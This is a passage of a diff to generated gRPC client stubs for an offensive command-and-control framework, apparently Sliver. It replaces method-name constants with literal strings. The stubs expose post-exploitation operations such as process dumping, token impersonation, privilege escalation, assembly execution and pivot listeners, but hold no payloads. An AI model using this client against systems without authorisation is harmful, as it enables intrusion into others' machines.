func (c *sliverRPCClient) SaveImplantProfile(ctx context.Context, in *clientpb.ImplantProfile, opts ...grpc.CallOption) (*clientpb.ImplantProfile, error) {
out := new(clientpb.ImplantProfile)
- err := c.cc.Invoke(ctx, SliverRPC_SaveImplantProfile_FullMethodName, in, out, opts...)
- if err != nil {
- return nil, err
- }
- return out, nil
-}
-
-func (c *sliverRPCClient) MsfStage(ctx context.Context, in *clientpb.MsfStagerReq, opts ...grpc.CallOption) (*clientpb.MsfStager, error) {
- out := new(clientpb.MsfStager)
- err := c.cc.Invoke(ctx, SliverRPC_MsfStage_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/SaveImplantProfile", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1225,7 +1030,7 @@ func (c *sliverRPCClient) MsfStage(ctx context.Context, in *clientpb.MsfStagerRe
func (c *sliverRPCClient) ShellcodeRDI(ctx context.Context, in *clientpb.ShellcodeRDIReq, opts ...grpc.CallOption) (*clientpb.ShellcodeRDI, error) {
out := new(clientpb.ShellcodeRDI)
- err := c.cc.Invoke(ctx, SliverRPC_ShellcodeRDI_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ShellcodeRDI", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1234,7 +1039,7 @@ func (c *sliverRPCClient) ShellcodeRDI(ctx context.Context, in *clientpb.Shellco
func (c *sliverRPCClient) GetCompiler(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Compiler, error) {
out := new(clientpb.Compiler)
- err := c.cc.Invoke(ctx, SliverRPC_GetCompiler_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetCompiler", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1243,7 +1048,7 @@ func (c *sliverRPCClient) GetCompiler(ctx context.Context, in *commonpb.Empty, o
func (c *sliverRPCClient) ShellcodeEncoder(ctx context.Context, in *clientpb.ShellcodeEncodeReq, opts ...grpc.CallOption) (*clientpb.ShellcodeEncode, error) {
out := new(clientpb.ShellcodeEncode)
- err := c.cc.Invoke(ctx, SliverRPC_ShellcodeEncoder_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ShellcodeEncoder", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1252,7 +1057,7 @@ func (c *sliverRPCClient) ShellcodeEncoder(ctx context.Context, in *clientpb.She
func (c *sliverRPCClient) ShellcodeEncoderMap(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.ShellcodeEncoderMap, error) {
out := new(clientpb.ShellcodeEncoderMap)
- err := c.cc.Invoke(ctx, SliverRPC_ShellcodeEncoderMap_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ShellcodeEncoderMap", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1261,7 +1066,7 @@ func (c *sliverRPCClient) ShellcodeEncoderMap(ctx context.Context, in *commonpb.
func (c *sliverRPCClient) TrafficEncoderMap(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.TrafficEncoderMap, error) {
out := new(clientpb.TrafficEncoderMap)
- err := c.cc.Invoke(ctx, SliverRPC_TrafficEncoderMap_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/TrafficEncoderMap", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1270,7 +1075,7 @@ func (c *sliverRPCClient) TrafficEncoderMap(ctx context.Context, in *commonpb.Em
func (c *sliverRPCClient) TrafficEncoderAdd(ctx context.Context, in *clientpb.TrafficEncoder, opts ...grpc.CallOption) (*clientpb.TrafficEncoderTests, error) {
out := new(clientpb.TrafficEncoderTests)
- err := c.cc.Invoke(ctx, SliverRPC_TrafficEncoderAdd_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/TrafficEncoderAdd", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1279,7 +1084,7 @@ func (c *sliverRPCClient) TrafficEncoderAdd(ctx context.Context, in *clientpb.Tr
func (c *sliverRPCClient) TrafficEncoderRm(ctx context.Context, in *clientpb.TrafficEncoder, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_TrafficEncoderRm_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/TrafficEncoderRm", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1288,7 +1093,7 @@ func (c *sliverRPCClient) TrafficEncoderRm(ctx context.Context, in *clientpb.Tra
func (c *sliverRPCClient) Websites(ctx context.Context, in *commonpb.Empty, opts ...grpc.CallOption) (*clientpb.Websites, error) {
out := new(clientpb.Websites)
- err := c.cc.Invoke(ctx, SliverRPC_Websites_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Websites", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1297,7 +1102,7 @@ func (c *sliverRPCClient) Websites(ctx context.Context, in *commonpb.Empty, opts
func (c *sliverRPCClient) Website(ctx context.Context, in *clientpb.Website, opts ...grpc.CallOption) (*clientpb.Website, error) {
out := new(clientpb.Website)
- err := c.cc.Invoke(ctx, SliverRPC_Website_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Website", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1306,7 +1111,7 @@ func (c *sliverRPCClient) Website(ctx context.Context, in *clientpb.Website, opt
func (c *sliverRPCClient) WebsiteRemove(ctx context.Context, in *clientpb.Website, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_WebsiteRemove_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WebsiteRemove", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1315,7 +1120,7 @@ func (c *sliverRPCClient) WebsiteRemove(ctx context.Context, in *clientpb.Websit
func (c *sliverRPCClient) WebsiteAddContent(ctx context.Context, in *clientpb.WebsiteAddContent, opts ...grpc.CallOption) (*clientpb.Website, error) {
out := new(clientpb.Website)
- err := c.cc.Invoke(ctx, SliverRPC_WebsiteAddContent_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WebsiteAddContent", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1324,7 +1129,7 @@ func (c *sliverRPCClient) WebsiteAddContent(ctx context.Context, in *clientpb.We
func (c *sliverRPCClient) WebsiteUpdateContent(ctx context.Context, in *clientpb.WebsiteAddContent, opts ...grpc.CallOption) (*clientpb.Website, error) {
out := new(clientpb.Website)
- err := c.cc.Invoke(ctx, SliverRPC_WebsiteUpdateContent_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WebsiteUpdateContent", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1333,7 +1138,7 @@ func (c *sliverRPCClient) WebsiteUpdateContent(ctx context.Context, in *clientpb
func (c *sliverRPCClient) WebsiteRemoveContent(ctx context.Context, in *clientpb.WebsiteRemoveContent, opts ...grpc.CallOption) (*clientpb.Website, error) {
out := new(clientpb.Website)
- err := c.cc.Invoke(ctx, SliverRPC_WebsiteRemoveContent_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/WebsiteRemoveContent", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1342,7 +1147,7 @@ func (c *sliverRPCClient) WebsiteRemoveContent(ctx context.Context, in *clientpb
func (c *sliverRPCClient) Ping(ctx context.Context, in *sliverpb.Ping, opts ...grpc.CallOption) (*sliverpb.Ping, error) {
out := new(sliverpb.Ping)
- err := c.cc.Invoke(ctx, SliverRPC_Ping_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Ping", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1351,7 +1156,7 @@ func (c *sliverRPCClient) Ping(ctx context.Context, in *sliverpb.Ping, opts ...g
func (c *sliverRPCClient) Ps(ctx context.Context, in *sliverpb.PsReq, opts ...grpc.CallOption) (*sliverpb.Ps, error) {
out := new(sliverpb.Ps)
- err := c.cc.Invoke(ctx, SliverRPC_Ps_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Ps", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1360,7 +1165,7 @@ func (c *sliverRPCClient) Ps(ctx context.Context, in *sliverpb.PsReq, opts ...gr
func (c *sliverRPCClient) Terminate(ctx context.Context, in *sliverpb.TerminateReq, opts ...grpc.CallOption) (*sliverpb.Terminate, error) {
out := new(sliverpb.Terminate)
- err := c.cc.Invoke(ctx, SliverRPC_Terminate_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Terminate", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1369,7 +1174,7 @@ func (c *sliverRPCClient) Terminate(ctx context.Context, in *sliverpb.TerminateR
func (c *sliverRPCClient) Ifconfig(ctx context.Context, in *sliverpb.IfconfigReq, opts ...grpc.CallOption) (*sliverpb.Ifconfig, error) {
out := new(sliverpb.Ifconfig)
- err := c.cc.Invoke(ctx, SliverRPC_Ifconfig_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Ifconfig", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1378,7 +1183,7 @@ func (c *sliverRPCClient) Ifconfig(ctx context.Context, in *sliverpb.IfconfigReq
func (c *sliverRPCClient) Netstat(ctx context.Context, in *sliverpb.NetstatReq, opts ...grpc.CallOption) (*sliverpb.Netstat, error) {
out := new(sliverpb.Netstat)
- err := c.cc.Invoke(ctx, SliverRPC_Netstat_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Netstat", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1387,7 +1192,7 @@ func (c *sliverRPCClient) Netstat(ctx context.Context, in *sliverpb.NetstatReq,
func (c *sliverRPCClient) Ls(ctx context.Context, in *sliverpb.LsReq, opts ...grpc.CallOption) (*sliverpb.Ls, error) {
out := new(sliverpb.Ls)
- err := c.cc.Invoke(ctx, SliverRPC_Ls_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Ls", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1396,7 +1201,7 @@ func (c *sliverRPCClient) Ls(ctx context.Context, in *sliverpb.LsReq, opts ...gr
func (c *sliverRPCClient) Cd(ctx context.Context, in *sliverpb.CdReq, opts ...grpc.CallOption) (*sliverpb.Pwd, error) {
out := new(sliverpb.Pwd)
- err := c.cc.Invoke(ctx, SliverRPC_Cd_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Cd", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1405,7 +1210,7 @@ func (c *sliverRPCClient) Cd(ctx context.Context, in *sliverpb.CdReq, opts ...gr
func (c *sliverRPCClient) Pwd(ctx context.Context, in *sliverpb.PwdReq, opts ...grpc.CallOption) (*sliverpb.Pwd, error) {
out := new(sliverpb.Pwd)
- err := c.cc.Invoke(ctx, SliverRPC_Pwd_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Pwd", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1414,7 +1219,7 @@ func (c *sliverRPCClient) Pwd(ctx context.Context, in *sliverpb.PwdReq, opts ...
func (c *sliverRPCClient) Mv(ctx context.Context, in *sliverpb.MvReq, opts ...grpc.CallOption) (*sliverpb.Mv, error) {
out := new(sliverpb.Mv)
- err := c.cc.Invoke(ctx, SliverRPC_Mv_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Mv", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1423,7 +1228,7 @@ func (c *sliverRPCClient) Mv(ctx context.Context, in *sliverpb.MvReq, opts ...gr
func (c *sliverRPCClient) Cp(ctx context.Context, in *sliverpb.CpReq, opts ...grpc.CallOption) (*sliverpb.Cp, error) {
out := new(sliverpb.Cp)
- err := c.cc.Invoke(ctx, SliverRPC_Cp_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Cp", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1432,7 +1237,7 @@ func (c *sliverRPCClient) Cp(ctx context.Context, in *sliverpb.CpReq, opts ...gr
func (c *sliverRPCClient) Rm(ctx context.Context, in *sliverpb.RmReq, opts ...grpc.CallOption) (*sliverpb.Rm, error) {
out := new(sliverpb.Rm)
- err := c.cc.Invoke(ctx, SliverRPC_Rm_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Rm", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1441,7 +1246,7 @@ func (c *sliverRPCClient) Rm(ctx context.Context, in *sliverpb.RmReq, opts ...gr
func (c *sliverRPCClient) Mkdir(ctx context.Context, in *sliverpb.MkdirReq, opts ...grpc.CallOption) (*sliverpb.Mkdir, error) {
out := new(sliverpb.Mkdir)
- err := c.cc.Invoke(ctx, SliverRPC_Mkdir_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Mkdir", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1450,7 +1255,7 @@ func (c *sliverRPCClient) Mkdir(ctx context.Context, in *sliverpb.MkdirReq, opts
func (c *sliverRPCClient) Download(ctx context.Context, in *sliverpb.DownloadReq, opts ...grpc.CallOption) (*sliverpb.Download, error) {
out := new(sliverpb.Download)
- err := c.cc.Invoke(ctx, SliverRPC_Download_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Download", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1459,7 +1264,7 @@ func (c *sliverRPCClient) Download(ctx context.Context, in *sliverpb.DownloadReq
func (c *sliverRPCClient) Upload(ctx context.Context, in *sliverpb.UploadReq, opts ...grpc.CallOption) (*sliverpb.Upload, error) {
out := new(sliverpb.Upload)
- err := c.cc.Invoke(ctx, SliverRPC_Upload_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Upload", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1468,7 +1273,7 @@ func (c *sliverRPCClient) Upload(ctx context.Context, in *sliverpb.UploadReq, op
func (c *sliverRPCClient) Grep(ctx context.Context, in *sliverpb.GrepReq, opts ...grpc.CallOption) (*sliverpb.Grep, error) {
out := new(sliverpb.Grep)
- err := c.cc.Invoke(ctx, SliverRPC_Grep_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Grep", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1477,7 +1282,7 @@ func (c *sliverRPCClient) Grep(ctx context.Context, in *sliverpb.GrepReq, opts .
func (c *sliverRPCClient) Chmod(ctx context.Context, in *sliverpb.ChmodReq, opts ...grpc.CallOption) (*sliverpb.Chmod, error) {
out := new(sliverpb.Chmod)
- err := c.cc.Invoke(ctx, SliverRPC_Chmod_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Chmod", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1486,7 +1291,7 @@ func (c *sliverRPCClient) Chmod(ctx context.Context, in *sliverpb.ChmodReq, opts
func (c *sliverRPCClient) Chown(ctx context.Context, in *sliverpb.ChownReq, opts ...grpc.CallOption) (*sliverpb.Chown, error) {
out := new(sliverpb.Chown)
- err := c.cc.Invoke(ctx, SliverRPC_Chown_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Chown", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1495,7 +1300,7 @@ func (c *sliverRPCClient) Chown(ctx context.Context, in *sliverpb.ChownReq, opts
func (c *sliverRPCClient) Chtimes(ctx context.Context, in *sliverpb.ChtimesReq, opts ...grpc.CallOption) (*sliverpb.Chtimes, error) {
out := new(sliverpb.Chtimes)
- err := c.cc.Invoke(ctx, SliverRPC_Chtimes_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Chtimes", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1504,7 +1309,7 @@ func (c *sliverRPCClient) Chtimes(ctx context.Context, in *sliverpb.ChtimesReq,
func (c *sliverRPCClient) MemfilesList(ctx context.Context, in *sliverpb.MemfilesListReq, opts ...grpc.CallOption) (*sliverpb.Ls, error) {
out := new(sliverpb.Ls)
- err := c.cc.Invoke(ctx, SliverRPC_MemfilesList_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MemfilesList", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1513,7 +1318,7 @@ func (c *sliverRPCClient) MemfilesList(ctx context.Context, in *sliverpb.Memfile
func (c *sliverRPCClient) MemfilesAdd(ctx context.Context, in *sliverpb.MemfilesAddReq, opts ...grpc.CallOption) (*sliverpb.MemfilesAdd, error) {
out := new(sliverpb.MemfilesAdd)
- err := c.cc.Invoke(ctx, SliverRPC_MemfilesAdd_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MemfilesAdd", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1522,7 +1327,7 @@ func (c *sliverRPCClient) MemfilesAdd(ctx context.Context, in *sliverpb.Memfiles
func (c *sliverRPCClient) MemfilesRm(ctx context.Context, in *sliverpb.MemfilesRmReq, opts ...grpc.CallOption) (*sliverpb.MemfilesRm, error) {
out := new(sliverpb.MemfilesRm)
- err := c.cc.Invoke(ctx, SliverRPC_MemfilesRm_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MemfilesRm", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1531,7 +1336,7 @@ func (c *sliverRPCClient) MemfilesRm(ctx context.Context, in *sliverpb.MemfilesR
func (c *sliverRPCClient) Mount(ctx context.Context, in *sliverpb.MountReq, opts ...grpc.CallOption) (*sliverpb.Mount, error) {
out := new(sliverpb.Mount)
- err := c.cc.Invoke(ctx, SliverRPC_Mount_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Mount", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1540,7 +1345,7 @@ func (c *sliverRPCClient) Mount(ctx context.Context, in *sliverpb.MountReq, opts
func (c *sliverRPCClient) ProcessDump(ctx context.Context, in *sliverpb.ProcessDumpReq, opts ...grpc.CallOption) (*sliverpb.ProcessDump, error) {
out := new(sliverpb.ProcessDump)
- err := c.cc.Invoke(ctx, SliverRPC_ProcessDump_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ProcessDump", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1549,7 +1354,7 @@ func (c *sliverRPCClient) ProcessDump(ctx context.Context, in *sliverpb.ProcessD
func (c *sliverRPCClient) RunAs(ctx context.Context, in *sliverpb.RunAsReq, opts ...grpc.CallOption) (*sliverpb.RunAs, error) {
out := new(sliverpb.RunAs)
- err := c.cc.Invoke(ctx, SliverRPC_RunAs_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RunAs", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1558,7 +1363,7 @@ func (c *sliverRPCClient) RunAs(ctx context.Context, in *sliverpb.RunAsReq, opts
func (c *sliverRPCClient) Impersonate(ctx context.Context, in *sliverpb.ImpersonateReq, opts ...grpc.CallOption) (*sliverpb.Impersonate, error) {
out := new(sliverpb.Impersonate)
- err := c.cc.Invoke(ctx, SliverRPC_Impersonate_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Impersonate", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1567,7 +1372,7 @@ func (c *sliverRPCClient) Impersonate(ctx context.Context, in *sliverpb.Imperson
func (c *sliverRPCClient) RevToSelf(ctx context.Context, in *sliverpb.RevToSelfReq, opts ...grpc.CallOption) (*sliverpb.RevToSelf, error) {
out := new(sliverpb.RevToSelf)
- err := c.cc.Invoke(ctx, SliverRPC_RevToSelf_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/RevToSelf", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1576,7 +1381,7 @@ func (c *sliverRPCClient) RevToSelf(ctx context.Context, in *sliverpb.RevToSelfR
func (c *sliverRPCClient) GetSystem(ctx context.Context, in *clientpb.GetSystemReq, opts ...grpc.CallOption) (*sliverpb.GetSystem, error) {
out := new(sliverpb.GetSystem)
- err := c.cc.Invoke(ctx, SliverRPC_GetSystem_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/GetSystem", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1585,7 +1390,7 @@ func (c *sliverRPCClient) GetSystem(ctx context.Context, in *clientpb.GetSystemR
func (c *sliverRPCClient) Task(ctx context.Context, in *sliverpb.TaskReq, opts ...grpc.CallOption) (*sliverpb.Task, error) {
out := new(sliverpb.Task)
- err := c.cc.Invoke(ctx, SliverRPC_Task_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Task", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1594,7 +1399,7 @@ func (c *sliverRPCClient) Task(ctx context.Context, in *sliverpb.TaskReq, opts .
func (c *sliverRPCClient) Msf(ctx context.Context, in *clientpb.MSFReq, opts ...grpc.CallOption) (*sliverpb.Task, error) {
out := new(sliverpb.Task)
- err := c.cc.Invoke(ctx, SliverRPC_Msf_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Msf", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1603,7 +1408,7 @@ func (c *sliverRPCClient) Msf(ctx context.Context, in *clientpb.MSFReq, opts ...
func (c *sliverRPCClient) MsfRemote(ctx context.Context, in *clientpb.MSFRemoteReq, opts ...grpc.CallOption) (*sliverpb.Task, error) {
out := new(sliverpb.Task)
- err := c.cc.Invoke(ctx, SliverRPC_MsfRemote_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/MsfRemote", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1612,7 +1417,7 @@ func (c *sliverRPCClient) MsfRemote(ctx context.Context, in *clientpb.MSFRemoteR
func (c *sliverRPCClient) ExecuteAssembly(ctx context.Context, in *sliverpb.ExecuteAssemblyReq, opts ...grpc.CallOption) (*sliverpb.ExecuteAssembly, error) {
out := new(sliverpb.ExecuteAssembly)
- err := c.cc.Invoke(ctx, SliverRPC_ExecuteAssembly_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ExecuteAssembly", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1621,7 +1426,7 @@ func (c *sliverRPCClient) ExecuteAssembly(ctx context.Context, in *sliverpb.Exec
func (c *sliverRPCClient) Migrate(ctx context.Context, in *clientpb.MigrateReq, opts ...grpc.CallOption) (*sliverpb.Migrate, error) {
out := new(sliverpb.Migrate)
- err := c.cc.Invoke(ctx, SliverRPC_Migrate_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Migrate", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1630,7 +1435,7 @@ func (c *sliverRPCClient) Migrate(ctx context.Context, in *clientpb.MigrateReq,
func (c *sliverRPCClient) Execute(ctx context.Context, in *sliverpb.ExecuteReq, opts ...grpc.CallOption) (*sliverpb.Execute, error) {
out := new(sliverpb.Execute)
- err := c.cc.Invoke(ctx, SliverRPC_Execute_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Execute", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1639,7 +1444,7 @@ func (c *sliverRPCClient) Execute(ctx context.Context, in *sliverpb.ExecuteReq,
func (c *sliverRPCClient) ExecuteWindows(ctx context.Context, in *sliverpb.ExecuteWindowsReq, opts ...grpc.CallOption) (*sliverpb.Execute, error) {
out := new(sliverpb.Execute)
- err := c.cc.Invoke(ctx, SliverRPC_ExecuteWindows_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ExecuteWindows", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1648,7 +1453,7 @@ func (c *sliverRPCClient) ExecuteWindows(ctx context.Context, in *sliverpb.Execu
func (c *sliverRPCClient) Sideload(ctx context.Context, in *sliverpb.SideloadReq, opts ...grpc.CallOption) (*sliverpb.Sideload, error) {
out := new(sliverpb.Sideload)
- err := c.cc.Invoke(ctx, SliverRPC_Sideload_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Sideload", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1657,7 +1462,7 @@ func (c *sliverRPCClient) Sideload(ctx context.Context, in *sliverpb.SideloadReq
func (c *sliverRPCClient) SpawnDll(ctx context.Context, in *sliverpb.InvokeSpawnDllReq, opts ...grpc.CallOption) (*sliverpb.SpawnDll, error) {
out := new(sliverpb.SpawnDll)
- err := c.cc.Invoke(ctx, SliverRPC_SpawnDll_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/SpawnDll", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1666,7 +1471,7 @@ func (c *sliverRPCClient) SpawnDll(ctx context.Context, in *sliverpb.InvokeSpawn
func (c *sliverRPCClient) Screenshot(ctx context.Context, in *sliverpb.ScreenshotReq, opts ...grpc.CallOption) (*sliverpb.Screenshot, error) {
out := new(sliverpb.Screenshot)
- err := c.cc.Invoke(ctx, SliverRPC_Screenshot_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Screenshot", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1675,7 +1480,7 @@ func (c *sliverRPCClient) Screenshot(ctx context.Context, in *sliverpb.Screensho
func (c *sliverRPCClient) CurrentTokenOwner(ctx context.Context, in *sliverpb.CurrentTokenOwnerReq, opts ...grpc.CallOption) (*sliverpb.CurrentTokenOwner, error) {
out := new(sliverpb.CurrentTokenOwner)
- err := c.cc.Invoke(ctx, SliverRPC_CurrentTokenOwner_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/CurrentTokenOwner", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1684,7 +1489,7 @@ func (c *sliverRPCClient) CurrentTokenOwner(ctx context.Context, in *sliverpb.Cu
func (c *sliverRPCClient) Services(ctx context.Context, in *sliverpb.ServicesReq, opts ...grpc.CallOption) (*sliverpb.Services, error) {
out := new(sliverpb.Services)
- err := c.cc.Invoke(ctx, SliverRPC_Services_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/Services", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1693,7 +1498,7 @@ func (c *sliverRPCClient) Services(ctx context.Context, in *sliverpb.ServicesReq
func (c *sliverRPCClient) ServiceDetail(ctx context.Context, in *sliverpb.ServiceDetailReq, opts ...grpc.CallOption) (*sliverpb.ServiceDetail, error) {
out := new(sliverpb.ServiceDetail)
- err := c.cc.Invoke(ctx, SliverRPC_ServiceDetail_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/ServiceDetail", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1702,7 +1507,7 @@ func (c *sliverRPCClient) ServiceDetail(ctx context.Context, in *sliverpb.Servic
func (c *sliverRPCClient) StartServiceByName(ctx context.Context, in *sliverpb.StartServiceByNameReq, opts ...grpc.CallOption) (*sliverpb.ServiceInfo, error) {
out := new(sliverpb.ServiceInfo)
- err := c.cc.Invoke(ctx, SliverRPC_StartServiceByName_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/StartServiceByName", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1711,7 +1516,7 @@ func (c *sliverRPCClient) StartServiceByName(ctx context.Context, in *sliverpb.S
func (c *sliverRPCClient) PivotStartListener(ctx context.Context, in *sliverpb.PivotStartListenerReq, opts ...grpc.CallOption) (*sliverpb.PivotListener, error) {
out := new(sliverpb.PivotListener)
- err := c.cc.Invoke(ctx, SliverRPC_PivotStartListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/PivotStartListener", in, out, opts...)
if err != nil {
return nil, err
}
@@ -1720,7 +1525,7 @@ func (c *sliverRPCClient) PivotStartListener(ctx context.Context, in *sliverpb.P
func (c *sliverRPCClient) PivotStopListener(ctx context.Context, in *sliverpb.PivotStopListenerReq, opts ...grpc.CallOption) (*commonpb.Empty, error) {
out := new(commonpb.Empty)
- err := c.cc.Invoke(ctx, SliverRPC_PivotStopListener_FullMethodName, in, out, opts...)
+ err := c.cc.Invoke(ctx, "/rpcpb.SliverRPC/PivotStopListener", in, out, opts...)
if err != nil {
return nil, err
}
